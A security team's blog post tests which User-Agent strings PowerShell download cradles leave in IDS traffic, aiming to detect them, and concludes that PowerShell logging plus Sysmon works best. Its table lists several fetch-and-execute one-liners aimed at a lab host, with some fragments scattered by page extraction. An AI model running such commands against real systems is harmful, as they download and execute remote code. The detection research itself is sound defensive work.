Pwntario Team Blog
  • Home
  • Team Posts
    • Anton's Posts
      • Hunt Fast: Splunk and tstats
      • Hunting Malicious Macros
      • Get Azure Key Vault Data into Splunk
      • Edit Your Sysmon Config in Style
      • Wrangle Your PowerShell Transcript Logs with Apache Nifi
      • (Very) Basic Elastic SIEM Set up
      • Moloch + Suricata + JA3
      • Making Lateral Movement Difficult in an Active Directory Environment
      • Taking a Closer Look at PowerShell Download Cradles
      • Visualize Windows Logs With Neo4j
      • Device Guard - Fixing VMWare Tools
      • Offensive Security OSCE (CTP) Review
      • (Attempting) to Detect Responder with Sysmon
      • Working with Sysmon
      • Setting Up Sysmon
    • Lee's Posts
      • Malicious AzureAD Application Registrations
  • Members
    • @ShellStorm
    • @seeonedave
    • @ZupOctopus
    • @Antonlovesdnb
    • @InvokeThreatGuy
Powered by GitBook
On this page

Was this helpful?

  1. Team Posts
  2. Anton's Posts

Taking a Closer Look at PowerShell Download Cradles

PreviousMaking Lateral Movement Difficult in an Active Directory EnvironmentNextVisualize Windows Logs With Neo4j

Last updated 4 years ago

Was this helpful?

Intro

There was recently a Twitter around PowerShell download cradles and the User Agents they use. I decided to take a look via IDS.

Methodology

I grabbed list from GitHub page and ran them through them all, hosting a benign PowerShell script on a local web server. I then used the awesome IDS distribution to take a look at the User Agents these various methods used.

Findings

Command

User-Agent

IEX (New-Object Net.Webclient).downloadstring("")

No User Agent

IEX (iwr '')

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('[) -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

N/A – Couldn’t get this one to work

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','[) $h.responseText

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','[) $h.responseText

Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Microsoft BITS/7.8

$a = New-Object System.Xml.XmlDocument

$a.command.a.execute | iex

No User Agent

Notes

  • It looks like from a stealth point of view, at least when looking at User Agents, the first and last methods on the chart seem more stealthy. Although the BITS method is interesting as well, depending on the organizations' traffic profile, BITS might be very common.

  • I ran these tests on a Windows 10 host, with the latest updates & PSv5

Major Minor Build Revision

5 1 15063 483

  • I was kind of hoping that each method would leave a unique User Agent that I could build some kind of IDS alert around, but this doesn't seem to be the case. Your best bet in identifying malicious activity of this sort is PowerShell logging + Sysmon.

Hope this was helpful.

Import-Module bitstransfer;Start-BitsTransfer '' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

$a.Load("")

Fairly interesting findings. I'm not sure if this was an exhaustive list of cradles. If anyone has more they'd like tested just message me on twitter

discussion
this
@harmj0y's
SELKS
http://192.168.1.116/hey.ps1
http://192.168.1.116/hey.ps1
http://192.168.1.116/hey.ps1');start-sleep](http://192.168.1.116/hey.ps1'%29;start-sleep
http://192.168.1.116/hey.ps1',$false);$h.send();iex](http://192.168.1.116/hey.ps1',$false%29;$h.send%28%29;iex
http://192.168.1.116/hey.ps1',$false);$h.send();iex](http://192.168.1.116/hey.ps1',$false%29;$h.send%28%29;iex
http://192.168.1.116/hey2.ps1
http://192.168.1.116/hey.txt
@Antonlovesdnb